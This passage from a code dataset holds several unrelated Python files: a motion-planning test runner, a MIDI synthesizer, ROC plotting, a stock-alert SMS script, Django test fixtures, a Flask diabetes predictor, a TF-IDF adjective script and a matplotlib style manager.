problem\",prname,\"with planner\",p)\n print(\"Parameters:\")\n for (k,v) in iteritems(params):\n print(\" \",k,\":\",v)\n return\n\ndef runViz(problem,planner):\n #runVisualizer(rrtChallengeTest(),type=planner,nextStateSamplingRange=0.15,edgeCheckTolerance = 0.005)\n planner,params = parseParameters(problem,planner)\n if 'maxTime' in params:\n del params['maxTime']\n \n print(\"Planning on problem\",problem,\"with planner\",planner)\n print(\"Parameters:\")\n for (k,v) in iteritems(params):\n print(\" \",k,\":\",v)\n runVisualizer(all_problems[problem],type=planner,**params)\n \nif __name__==\"__main__\":\n #HACK: uncomment one of these to test manually\n #runViz('Kink','rrt*')\n #test KD-tree in noneuclidean spaces\n #runViz('Pendulum','ao-rrt(numControlSamples=10,nearestNeighborMethod=bruteforce)')\n #runViz('Pendulum','ao-rrt')\n #runViz('Dubins','stable-sparse-rrt(selectionRadius=0.25,witnessRadius=0.2)')\n #runViz('DoubleIntegrator','stable-sparse-rrt(selectionRadius=0.3,witnessRadius=0.3)')\n #runViz('Pendulum','stable-sparse-rrt(selectionRadius=0.3,witnessRadius=0.16)')\n #runViz('Flappy','stable-sparse-rrt(selectionRadius=70,witnessRadius=35)')\n\n if len(sys.argv) < 3:\n print(\"Usage: main.py [-v] Problem Planner1 ... 
Plannerk\")\n print()\n print(\" Problem can be one of:\")\n print(\" \",\",\\n \".join(sorted(all_problems)))\n print(\" or 'all' to test all problems.\")\n print()\n print(\" Planner can be one of:\")\n print(\" \",\",\\n \".join(sorted(all_planners)))\n print(\" or 'all' to test all planners.\")\n print()\n print(\" If -v is provided, runs an OpenGL visualization of planning\")\n exit(0)\n if sys.argv[1] == '-v':\n from pomp.visualizer import runVisualizer\n #visualization mode\n print(\"Testing visualization with problem\",sys.argv[2],\"and planner\",sys.argv[3])\n runViz(sys.argv[2],sys.argv[3])\n else:\n print()\n print(\"Testing problems\",sys.argv[1],\"with planners\",sys.argv[2:])\n runTests(problems=[sys.argv[1]],planners=sys.argv[2:])\n","repo_name":"krishauser/pyOptimalMotionPlanning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"32"} +{"seq_id":"22940613806","text":"import mido\nimport numpy as np\n\n######################################\n######################################\n######################################\n\ndef midinote2freq(n):\n A = 440 # Frecuencia de LA\n An = 69 # Valor correspondiente a LA440 en midi\n # distance = abs(An - n)\n # if n < An:\n # return A * 2 ** (-distance / 12)\n # else:\n # return A * 2 ** (distance / 12)\n distance = n - An\n return A * 2 ** (distance / 12)\n\n\ndef get_tempo(mid_):\n for msg in mid_: # Search for tempo\n if msg.type == 'set_tempo':\n return msg.tempo\n # return msg.tempo*2\n\n\nclass Midi:\n def __init__(self, file_name, sample_rate = 44100):\n self.mid_object = None\n self.tracks_midi_list = None\n self.amount_of_tracks = 0\n self.file_name = file_name\n self.sample_rate = sample_rate\n self.wav_list = None\n self.sec_per_tick = 0\n self.duration_in_s = 0\n self.parserMidi()\n\n def parserMidi(self):\n self.mid_object = mido.MidiFile(self.file_name, clip=True)\n self.amount_of_tracks = len(self.mid_object.tracks)\n\n \n num_mess = [] # Sacando los duplicados, segun la documentacion\n dup = []\n\n for track in self.mid_object.tracks:\n if len(track) in num_mess:\n dup.append(track)\n else:\n num_mess.append(len(track))\n for track in dup:\n self.mid_object.tracks.remove(track)\n\n \n tracks_midi_list_dict = [[] for i in range(self.amount_of_tracks)]\n self.tracks_midi_list = [[] for i in range(self.amount_of_tracks)]\n\n for j, track in enumerate(self.mid_object.tracks): # Solo las que tienen on y off \n for i in track:\n if i.type == 'note_on' or i.type == 'note_off':\n tracks_midi_list_dict[j].append(i.dict())\n \n for j, track in enumerate(tracks_midi_list_dict): # Los tiempos que da midi son deltas, se pasan a absolutos\n time_data = 0.0\n for i in track:\n time = i['time'] + time_data\n i['time'] = time\n time_data = time\n if i['type'] == 'note_on' and i['velocity'] == 0:\n i['type'] = 'note_off'\n # El formato queda [type, note, time, velocity, channel]\n message_data = []\n if i['type'] == 'note_on' or i['type'] == 'note_off':\n message_data.append(i['type'])\n message_data.append(i['note'])\n message_data.append(i['time'])\n message_data.append(i['velocity'])\n message_data.append(i['channel'])\n self.tracks_midi_list[j].append(message_data)\n\n self.tracks_midi_list = [x for x in self.tracks_midi_list if x != []] # sacas las vacias\n self.amount_of_tracks = len(self.tracks_midi_list)\n self.duration_in_s = self.mid_object.length # duration_in_s en segundos\n tempo = 
get_tempo(self.mid_object) # Microseconds per beat\n tempo_s = tempo / 1e6 # Seconds per beat\n self.sec_per_tick = tempo_s / self.mid_object.ticks_per_beat\n # self.wav_list = [np.zeros(int(self.sample_rate * self.duration_in_s)) for i in range(self.amount_of_tracks)] # list of numpy arrays\n self.wav_list = [np.zeros((int(self.sample_rate * self.duration_in_s), 2)) for i in range(self.amount_of_tracks)]\n\n def synthesize_track(self, track, function): #(note, vel, duration_in_s)\n self.wav_list[track] = np.zeros(self.wav_list[track].shape)\n for j, message_data in enumerate(self.tracks_midi_list[track]):\n if message_data[0] == 'note_on':\n A = message_data[3] \n m = 1\n tick_start = message_data[2] # format is [type, note, time, velocity, channel]\n # advance until the matching note_off for this note is found\n while not (self.tracks_midi_list[track][j + m][0] == 'note_off' and self.tracks_midi_list[track][j + m][1] == \\\n message_data[1]):\n m += 1\n tick_end = self.tracks_midi_list[track][j + m][2]\n delta_ticks = tick_end - tick_start\n delta_t = delta_ticks * self.sec_per_tick\n n = int(self.sample_rate * tick_start * self.sec_per_tick)\n arr = function(message_data[1], A, delta_t)\n if arr.ndim == 1:\n arr = arr.reshape((-1, 1))\n wave = np.zeros((n, arr.shape[1]))\n wave = np.append(wave, arr, axis=0)\n if self.wav_list[track].shape[0] < wave.shape[0]:\n wave = wave[:self.wav_list[track].shape[0]]\n else:\n wave = np.append(wave, np.zeros((self.wav_list[track].shape[0] - wave.shape[0], wave.shape[1])), axis=0)\n self.wav_list[track] = np.add(self.wav_list[track], wave)\n maxVal = np.max(np.abs(self.wav_list[track]), axis=0)\n self.wav_list[track] /= np.maximum(1, maxVal)\n\n def weighTracks(self, midiArr):\n weighArr = np.sum(midiArr, axis=0)\n return weighArr / np.maximum(1, np.max(np.abs(weighArr), axis=0))\n\n######################################\n######################################\n######################################\n\n\nif __name__ == '__main__':\n\n from src.synthesizers.sampleSynth.sample_synth import sample_synth\n from scipy.io.wavfile import write\n\n synthBethoven = Midi('Beethoven-Moonlight-Sonata.mid')\n synthBethoven.synthesize_track(0, sample_synth)\n synthBethoven.synthesize_track(1, sample_synth)\n\n\n write(\"Beethoven.wav\", 44100, synthBethoven.weighTracks(synthBethoven.wav_list).astype(np.float32))","repo_name":"sergioandyp/ASSD-TP2","sub_path":"SynThool/src/MIDI/Midi.py","file_name":"Midi.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25597327923","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\nimport os\nimport pandas as pd\n\n\ndef save_roc(targets, scores, title, name):\n plt.figure()\n fpr, tpr, _ = roc_curve(targets, scores)\n roc_auc = auc(fpr, tpr)\n\n #roc_auc = round(roc_auc, 2)\n #roc_auc = str(roc_auc)\n #roc_auc = roc_auc[0] + '·' + roc_auc[2:]\n\n # plt.figure(figsize=(10, 10))\n plt.plot([0, 1], [0, 1], 'k--')\n plt.plot(fpr, tpr,color='steelblue', label='ROC curve (area = %0.2f)' % roc_auc)\n #plt.plot(fpr, tpr, color='steelblue', label='{} (AUC={},{}-{})'.format('Hepatobiliary disease', roc_auc,'0·65','0·71'))\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n #plt.title(title)\n plt.legend(loc='lower right',prop = {'size':7.5})\n #plt.legend(loc='best')\n plt.savefig(name + '.tiff')\n\n\ndef all_roc_plot(root,name,diseases_types,colors,confidence_set):\n for j,txt_file in enumerate(os.listdir(root)):\n if txt_file == 'gray_iris':\n 
continue\n results = open(root + txt_file).read().split('\\n')\n labels = []\n scores = []\n for i,row in enumerate(results):\n row = row.split(',')\n if i == 0 or i == len(results) - 1:\n continue\n labels.append(int(row[2]))\n scores.append(float(row[4]))\n\n #plt.figure()\n fpr, tpr, _ = roc_curve(labels, scores)\n\n roc_auc = auc(fpr, tpr)\n roc_auc = round(roc_auc,2)\n roc_auc = str(roc_auc)\n if len(roc_auc) != 4:\n roc_auc = roc_auc + '0'\n roc_auc = roc_auc[0] + '·' + roc_auc[2:]\n\n plt.plot([0, 1], [0, 1], 'k--')\n #plt.tick_params(labelsize=5)\n # plt.plot(fpr, tpr,color=colors[j], label='{} (AUC=%0.2f,{}-{})'.format(diseases_types[j],confidence_set[j][0],confidence_set[j][1]) % roc_auc)\n plt.plot(fpr, tpr, color=colors[j], label='{} (AUC={},{}-{})'.format(diseases_types[j], roc_auc,confidence_set[j][0],\n confidence_set[j][1]))\n plt.xlabel('1-Specificity')\n plt.ylabel('Sensitivity')\n #plt.title(title)\n plt.legend(loc='best',prop = {'size':7.5})\n #plt.savefig(name + '.tiff')\n plt.savefig(name + '.pdf', format='PDF', transparent=True, dpi=300, pad_inches=0)\n\n\n\nif __name__ == '__main__':\n root_slitlamp = ''\n root_fundus = ''\n name = ''\n diseases_types = ['Hepatobiliary Diseases','Liver cancer','Liver cirrhosis','Chronic viral Hepatitis',\n 'Nonalcoholic fatty liver disease','Cholelithiasis',\n 'Hepatic cyst']\n colors = ['crimson','chocolate','steelblue','rosybrown','darkkhaki','cadetblue','lightslategrey']\n # slitlamp\n #confidence_set = []\n #all_roc_plot(root_slitlamp, name, diseases_types, colors, confidence_set)\n\n # fundus\n confidence_set=[]\n all_roc_plot(root_fundus,name,diseases_types,colors,confidence_set)\n\n\n #from PIL import Image\n #im = Image.open('')\n #im.save('', dpi=(300.0, 300.0))\n #plt.savefig()\n #im.savefig('', format='PDF', transparent=True, dpi=300, pad_inches=0)","repo_name":"zoc-x/hepatobiliary-diseases","sub_path":"predict/utils/plot_roc.py","file_name":"plot_roc.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15514642939","text":"##USING ALPACA API\n##USING TWILIO API\n##LIMITATION 200 requests per every minute per API key\n##TASKS: SENDS OVERSOLD STOCK LIST TO A PHONE NUMBER\n##PURPOSE: ALLOW USERS TO EXPLORE DIFFERENT KINDS OF OVERSOLD STOCKS IN REVERSAL OF STOCK PRICE\n\n#https://github.com/alpacahq/alpaca-trade-api-python/#restget_barsetsymbols-timeframe-limit-startnone-endnone-afternone-untilnone\n\n##Ideas for improvements\n###FINDING BALANCE IN REQUESTS LIMIT & PERFORMANCE SPEED\n###DOES NOT REPEAT PREVIOUS SENT STOCK TAGS\n###EQUIP MULTIPLE STOCK TECHNICAL INDICATORS\n###ALERT SUDDEN DROP IN SPECIFIC STOCK\n###CREATING SPREAD SHEET TO KEEP TRACK SMS SENT\n###EXPLORE FOR MORE NUMPY OPTIONS\n###ALERT FOR STOCKS IN SPECIFIC CATEGORIES\n\n\n\nfrom config import *\n\nimport os\nimport time,json\nimport requests\nimport numpy as np\nimport alpaca_trade_api as tradeapi\nfrom twilio.rest import Client\nos.getenv('AccountSid')\nos.getenv('AuthToken')\nos.getenv('API_KEY')\nos.getenv('SECRET_KEY')\nos.getenv('sender_num')\nos.getenv('receiv_num')\n\n\nBASE_URL = \"https://paper-api.alpaca.markets\"\nACC_URL = \"{}/v2/account\".format(BASE_URL)\nORDER_URL = \"{}/v2/orders\".format(BASE_URL)\nASET_URL = \"{}/v2/assets\".format(BASE_URL)\nSMS_URL = \"https://api.twilio.com/2010-04-01\"\n\nHeaders = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY} ##Alpaca market assets \n\napi = tradeapi.REST(API_KEY,SECRET_KEY) ##assets 
data\n\nclient = Client(AccountSid, AuthToken) ##Twilio SMS\n\n\n\ndef get_account():\n\n resp = requests.get(ACC_URL, headers = Headers)\n return json.loads(resp.content)##load account infos\n\ndef get_asset():\n \n resp = requests.get(ASET_URL, headers = Headers)\n objects = json.loads(resp.content)\n \n \n \n stock = np.array([item[\"symbol\"] for item in objects if \n item[\"exchange\"] == \"NYSE\" and len(item[\"symbol\"]) <=5 ] )\n \n random_stock = np.random.shuffle(stock)\n \n return (stock) ##loads randomized listed stocks on NYSE \n\n \n \n\n\n\ndef create_order(symbol,qty,side,type,time_in_force,extended_hours = False):\n data = {\n \"symbol\" : symbol,\n \"qty\" : qty,\n \"side\" : side,\n \"type\" : type,\n \"time_in_force\": time_in_force,\n }\n order = requests.post(ORDER_URL,json=data, headers = Headers )\n return json.loads(order.content)[\"symbol\"]\n #response = create_order(\"AAPL\",100,\"buy\",\"market\",\"gtc\")##example\n\ndef get_order():\n order = requests.get(ORDER_URL, headers = Headers )\n return json.loads(order.content)\n ##load orders\n \ndef find_stock(array):\n counter = 0\n \n filtered_dict = {}\n for item in array:\n\n try:\n barset = api.get_barset(item, 'day', limit=60)\n ###retrieve stock prices of 60 days\n ticker_close = np.array([barset[item][j].c for j in range(len(barset[item]))])\n ##EVERYDAY PRICE stored in ticker_close\n SMA60 = (round((ticker_close.sum()/60),2))\n ##FIND SIMPLE MOVING AVERAGE of 60 DAYS VALUE\n \n today_close = barset[item][-1].c\n except IndexError: ##IN CASE OF INVALID TAG NAME\n continue\n\n percent_change = ((today_close - SMA60) / SMA60 * 100)\n ##FIND PERCENTAGE CHANGE\n if percent_change < -10: ##FOUND OVERSOLD STOCKS\n \n ##FIND WHICH STOCK IN REVERSAL\n barset_tenDays = api.get_barset(item, 'day', limit=10)\n ##RETREVIE STOCK PRICE 10 DAYS DATA\n close_tenDays = np.array([barset_tenDays[item][i].c for i in range(len(barset_tenDays[item]))])\n ##STROES STOCK PRICE OF TEN DAYS \n \n\n SMA10 = (round((close_tenDays.sum()/10),2))\n ##FOUND SIMPLE MOVING AVERAGE OF 10 DAYS\n tenDays_percent = ((today_close - SMA10) / SMA10 * 100)\n if tenDays_percent > 0:\n \n ##IF DISPARANCY IS GREATER THAN 10%, item stored\n if len(filtered_dict.keys()) >5:\n break\n filtered_dict[item] = round(percent_change,2)\n \n counter +=1\n ##COUNTER ENSURE BREAK FOR A MINUTE\n if (counter % 200 == 0):\n time.sleep(60)\n \n return filtered_dict\n ##RETURN THE DICTIONARY {STOCK NAME : PRICE}\n\nticker = get_asset()\n##ORIGINAL STOCK LIST IS ASSIGNED TO TICKER\n\n##TICKER IS THE PARAMETER FOR FINDING OVERSOLD STOCK\n\ndef send_sms(text):\n sorted(text, key=text.get, reverse=True) ##SORT DICT VALUES\n string = ''\n for key, value in text.items():\n string+= \"{}:{}%\\n\".format(key,str(value))\n ##CREATE STR WITH VALUES\n client.messages.create(body=string, \n ##SENDING STR ON SMS\n from_= sender_num,\n to= receiv_num\n )\n text.clear()\n del string ##RESET THE STRING\n\n\nsend_sms(find_stock(ticker))\n##SENDING SMS\n\n\n\n\n","repo_name":"KaungH/OVERSOLD-QUOTES-ALERT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42660460607","text":"from uuid import UUID\n\nimport graphene.test\nimport pytest\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db import transaction\n\nfrom tabletop import factories\nfrom tabletop.models import Checkin, CollectionGame, Player\nfrom tabletop.root_schema 
import schema\n\n\nclass Context(object):\n user = AnonymousUser()\n\n\nclass GqlClient(graphene.test.Client):\n def execute(self, query, user=None):\n context = Context()\n if user:\n context.user = user\n return super().execute(query, context=context)\n\n\n@pytest.fixture\ndef gql_client(db):\n return GqlClient(schema)\n\n\n@pytest.fixture\ndef default_user(db):\n user = factories.UserFactory(\n id=UUID(\"449c76aa-ad6a-46a8-b32b-91d965e3f462\"),\n name=\"Reel Big Phish\",\n email=\"reel.big.phish@example.com\",\n )\n user.set_password(\"phish.reel.big\")\n user.save()\n return user\n\n\n@pytest.fixture\ndef default_publisher(db, default_user):\n return factories.EntityFactory.create(\n id=UUID(\"74451c13-2a97-42a2-b136-03af6cbb4153\"),\n name=\"Guinea Pig Games\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_artist(db, default_user):\n return factories.EntityFactory.create(\n id=UUID(\"449c76aa-2a97-42a2-b136-03af6cbb4153\"),\n name=\"John Cusoe\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_designer(db, default_user):\n return factories.EntityFactory.create(\n id=UUID(\"449c76aa-2a97-42a2-b136-91d965e3f462\"),\n name=\"John Cusoe\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_game(db, default_publisher, default_user):\n return factories.GameFactory.create(\n id=UUID(\"76111b88-301b-4620-9c93-7c6d28f0987b\"),\n name=\"Unsettlers of Qatan\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_checkin(db, default_game, default_user):\n checkin = Checkin.objects.create(\n id=UUID(\"4b2a619c-40a8-4f58-96a5-c2f74795bfa7\"),\n game=default_game,\n created_by=default_user,\n )\n Player.objects.create(checkin=checkin, user=default_user)\n return checkin\n\n\n@pytest.fixture\ndef default_collection(db, default_game, default_user):\n with transaction.atomic():\n collection = factories.CollectionFactory.create(\n id=UUID(\"6960436f-53cd-4d00-bd5b-a293349e7d1f\"),\n name=\"My Games\",\n created_by=default_user,\n is_default=True,\n )\n CollectionGame.objects.create(game=default_game, collection=collection)\n return collection\n","repo_name":"dcramer/tabletop-server","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"73080486492","text":"#app.py\r\nfrom flask import Flask,request,render_template\r\nimport requests\r\nimport pickle\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.preprocessing import StandardScaler\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('diabetes_regression_model.pkl', 'rb'))\r\n@app.route('/',methods=['GET'])\r\ndef Home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route(\"/predict\",methods=['POST'])\r\ndef predict():\r\n if request.method=='POST':\r\n Pregnancies=int(request.form['Pregnancies'])\r\n Glucose=float(request.form['Glucose'])\r\n BloodPressure=float(request.form['BloodPressure'])\r\n SkinThickness=float(request.form['SkinThickness'])\r\n Insulin=float(request.form['Insulin'])\r\n BMI=float(request.form['BMI'])\r\n DiabetesPedgreeFunction=float(request.form['DiabetesPedgreeFunction'])\r\n Age=int(request.form['Age'])\r\n predictions=model.predict([[Pregnancies, Glucose,BloodPressure,SkinThickness,Insulin,BMI,DiabetesPedgreeFunction,Age]])\r\n if predictions==1:\r\n return render_template('index.html', prediction_text= \"Diabetic. 
\\n Consult doctor\")\r\n else:\r\n return render_template('index.html', prediction_text=\"Non-diabetic.\\n Stay fit and Healthy\")\r\n \r\n else:\r\n return render_template('index.html')\r\n \r\nif __name__==\"__main__\":\r\n app.run(debug=True,use_reloader=False)\r\n \r\n\r\n \r\n \r\n \r\n","repo_name":"ayan-zz/Diabetic-Analysis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18063514864","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport clean_nltk as cn\n\ndef main():\n data_directory = \"../Data/\"\n infile = data_directory + \"reviews_clean.csv\"\n outfile = data_directory + \"adjectives_tfidf.csv\"\n df = pd.read_csv(infile)\n\n category_dict = {}\n categories = ['Mexican', 'Italian', 'American']\n for category in categories:\n subset = df[df['category'] == category]\n text = cn.select_text(subset['text'])\n entities = cn.parse_text(text, lemmatize = False)\n adjectives = [str(entity[0]) for entity in entities if entity[-1] == 'JJ']\n adjectives_text = ' '.join(adjectives)\n category_dict[category] = adjectives_text\n\n tfidf = TfidfVectorizer()\n tfs = tfidf.fit_transform(category_dict.values())\n tfidf_data = pd.DataFrame([ pd.SparseSeries(tfs[i].toarray().ravel()) for i in np.arange(tfs.shape[0]) ])\n columns = tfidf.get_feature_names()\n tfidf_data.columns = columns\n tfidf_data.index = category_dict.keys()\n\n tfidf_data = tfidf_data.stack().reset_index()\n tfidf_data = tfidf_data.rename(columns = {'level_0': 'category', 'level_1': 'term', 0: 'tfidf'})\n top_data = tfidf_data.sort(['category', 'tfidf'], ascending = False).groupby('category').head()\n top20_data = tfidf_data.sort(['category', 'tfidf'], ascending = False).groupby('category').head(20)\n top20_data.to_csv(outfile, index = False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"roesler-stan/Yelp-Challenge","sub_path":"nltk/adjectives_tfidf.py","file_name":"adjectives_tfidf.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"31645865471","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport logging\n\nimport sys\nimport re\n\nfrom matplotlib import markers\nfrom matplotlib.markers import TICKLEFT, TICKRIGHT, TICKUP, TICKDOWN, CARETLEFT, CARETRIGHT, CARETUP, CARETDOWN\n\ntry:\n import xml.etree.cElementTree as et\nexcept ImportError:\n import xml.etree.ElementTree as et\n\nMARKERS = ['o', 's', '^', 'v', '<', '>', '.', '1', '2', '3', '4', '8',\n 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_', ]\n #TICKLEFT, TICKRIGHT, TICKUP, TICKDOWN, CARETLEFT, CARETRIGHT,\n #CARETUP, CARETDOWN ]\n\nLINESTYLES = ['-', '--', '-.', ':']\n\nFILLSTYLES = ['full', 'left', 'right', 'bottom', 'top', 'none']\n\nHATCHSTYLES = ['-', '|', '||', '|||', '/', '//', '///', '\\\\', '\\\\\\\\', '\\\\\\\\\\\\', '+', 'x', '*', 'o', 'O', '.']\n\nCOLORS_RDBU9 = [0, '#b2182b', '#d6604d', '#f4a582', '#fddbc7', '#cccccc', '#d1e5f0', '#92c5de', '#4393c3', '#2166ac']\nCOLORS_RDBU9C = [0, '#ffffff', '#000000', '#000000', '#000000', '#000000', '#000000', '#000000', '#ffffff', '#ffffff']\nCOLORS_CATEGORY10 = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']\nCOLORS_MATPLOTLIB = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']\n\nMATCH_EXACT = 1\nMATCH_CONTAINS = 
2\nMATCH_START = 3\nMATCH_END = 4\nMATCH_REGEXP = 5\n\n\nclass StylesManager(object):\n '''\n Interface to return a marker and colour combination for a given classifier\n \n Holds a number of ClassMatch objects that are run against each request, applying \n a given set of attributes (color, marker, etc.) for each one.\n \n Returns a CategoryMarker object that describes the complete style set.\n '''\n\n def __init__(self):\n self.matchdefs = [] # User defined match definitions\n self.automatchdefs = [] # Automatic match definitions (applied after, non-static but consistent)\n\n def add_match_definition(self):\n cm_def = ClassMatchDefinition()\n # Get unique marker definition (algo)\n # def = self.get_unique_marker_definition()\n ls_def = StyleDefinition()\n\n def get_style_for_class(self, classname):\n '''\n Run through each match and definition in turn, applying any non-None value to \n a cumulative marker definition. Return the result for use to assign a color.\n \n If we reach the end without a single hit, means we've got an unmatched class and\n need to assign a generic, unique, colour/label set to it. This must be stored\n (as an auto-assignment) to ensure the same class still receives the same label in future. \n '''\n is_matched = False\n ls_def = StyleDefinition()\n\n for cm_def, ls_definition in self.matchdefs:\n if cm_def.is_match_for_class(classname):\n # We have a match, extract and apply the set\n is_matched = True\n ls_def.import_from(ls_definition)\n\n if is_matched:\n # If we've previously generated an automatch marker for this we need to remove it\n self.automatchdefs = [(cm, ls) for cm, ls in self.automatchdefs if cm.match_str != classname]\n return ls_def\n\n else:\n # No custom match, only automatch definitions to test now\n for cm_def, ls_definition in self.automatchdefs:\n if cm_def.is_match_for_class(classname):\n # We have a match, set it\n return ls_definition\n # If we're here, means we've still not matched\n # We need to generate a unique marker and provide a default marker def (unique match)\n # to ensure class receives the same marker in future\n cm_def = ClassMatchDefinition(classname, MATCH_EXACT, is_auto=True)\n ls_def = self.get_unique_style_definition()\n self.automatchdefs.append((cm_def, ls_def))\n\n return ls_def\n\n def get_unique_style_definition(self):\n '''\n Assign a unique marker definition using standard progression set\n Note: this is only guaranteed to be unique at the point of assignment,\n subsequent filters/assignments may give identical output\n FIXME: Watch for clashes and fix, then refresh\n '''\n\n # Get a list of all StyleDefinitions currently in use\n currently_in_use = [ls_def for cm_def, ls_def in self.matchdefs + self.automatchdefs]\n for m in MARKERS:\n for l in LINESTYLES:\n for c in COLORS_CATEGORY10:\n ls_def = StyleDefinition(marker=m, linestyle=l, linewidth=1, color=c, markerfacecolor=c, markersize=5, fillstyle='full')\n if ls_def not in currently_in_use:\n return ls_def\n\n return None\n\n def getXMLMatchDefinitionsStyles(self, root):\n\n # Iterate over the entire set (in order) creating a XML representation of the MatchDef and Style\n for cm, ls in self.matchdefs + self.automatchdefs:\n\n cmls = et.SubElement(root, \"ClassMatchStyle\")\n if cm.is_auto:\n cmls.set('is_auto', 'true')\n\n cme = et.SubElement(cmls, \"ClassMatch\")\n cme.set(\"match_str\", cm.match_str)\n cme.set(\"match_type\", str(cm.match_type))\n\n lse = et.SubElement(cmls, \"Style\")\n\n for attr in ls.attr:\n value = ls.__dict__[attr]\n if value != None: # 
We can skip None values (default anyway)\n lse.set(attr, str(value))\n\n return root\n\n def setXMLMatchDefinitionsStyles(self, root):\n\n self.automatchdefs = []\n self.matchdefs = []\n\n convert = {\n 'linestyle': str,\n 'color': str,\n 'linewidth': float,\n 'marker': str,\n 'markersize': float,\n 'markeredgecolor': str,\n 'markerfacecolor': str,\n 'fillstyle': str,\n 'hatch': str,\n }\n\n for cmls in root.findall('ClassMatchStyle'):\n\n cm = ClassMatchDefinition()\n ls = StyleDefinition()\n\n cme = cmls.find('ClassMatch')\n cm.match_str = cme.get('match_str')\n cm.match_type = int(cme.get('match_type'))\n\n lse = cmls.find('Style')\n for attr in ls.attr:\n ls.__dict__[attr] = convert[attr](lse.get(attr, None))\n\n # Fix types\n ls.linewidth = float(ls.linewidth)\n if cmls.get('is_auto', False):\n cm.is_auto = True\n self.automatchdefs.append((cm, ls))\n else:\n self.matchdefs.append((cm, ls))\n\n\nclass StyleDefinition(object):\n '''\n \n '''\n line_attr = ['linestyle', 'color', 'linewidth']\n marker_attr = ['marker', 'markersize', 'markeredgecolor', 'markerfacecolor', 'fillstyle']\n hatch_attr = ['hatch']\n attr = line_attr + marker_attr + hatch_attr\n\n def __eq__(self, other):\n for attr in self.attr:\n if other.__dict__[attr] != self.__dict__[attr]:\n return False\n return True\n\n def __repr__(self):\n return \"StyleDefinition(%s)\" % self.__unicode__()\n\n def __unicode__(self):\n return ', '.join(['%s=%s' % (attr, self.__dict__[attr]) for attr in self.attr])\n\n def __init__(self, marker=None, markersize=None, markeredgecolor=None, markerfacecolor=None, fillstyle=None, linewidth=None, linestyle=None, color=None, hatch=None):\n\n self.marker = marker\n self.markersize = markersize\n self.markeredgecolor = markeredgecolor\n self.markerfacecolor = markerfacecolor\n self.fillstyle = fillstyle\n self.linestyle = linestyle\n self.linewidth = linewidth\n self.color = color\n self.hatch = hatch\n\n def import_from(self, ls_def):\n '''\n Apply any non-none components of the specified linestyle definition to this one\n producing a composite linestyle definition\n '''\n for attr in self.attr:\n if ls_def.__dict__[attr] != None:\n self.__dict__[attr] = ls_def.__dict__[attr]\n\n @property\n def kwargs(self):\n '''\n Return the style definition as a list of kwargs (where set)\n can be applied directly to the plot command\n '''\n return {attr: self.__dict__[attr] for attr in self.attr if self.__dict__[attr] != None}\n\n @property\n def line_kwargs(self):\n '''\n Return the line style definition as a list of kwargs (where set)\n can be applied directly to the plot command\n '''\n return {attr: self.__dict__[attr] for attr in self.line_attr if self.__dict__[attr] != None}\n\n @property\n def marker_kwargs(self):\n '''\n Return the marker style definition as a list of kwargs (where set)\n can be applied directly to the plot command\n '''\n return {attr: self.__dict__[attr] for attr in self.marker_attr if self.__dict__[attr] != None}\n\n @property\n def bar_kwargs(self):\n kw_attr = {'fc': 'markerfacecolor', 'ec': 'markeredgecolor', 'lw': 'linewidth', 'ecolor': 'markeredgecolor', 'hatch': 'hatch'}\n return {kw: self.__dict__[attr] for kw, attr in kw_attr.items() if self.__dict__[attr] != None}\n\n\nclass ClassMatchDefinition(object):\n '''\n '''\n\n def __init__(self, match_str='', match_type=MATCH_EXACT, is_auto=False):\n self.match_str = match_str\n self.match_type = match_type\n self.is_auto = is_auto\n\n def is_match_for_class(self, class_str):\n if self.match_type == MATCH_EXACT:\n return 
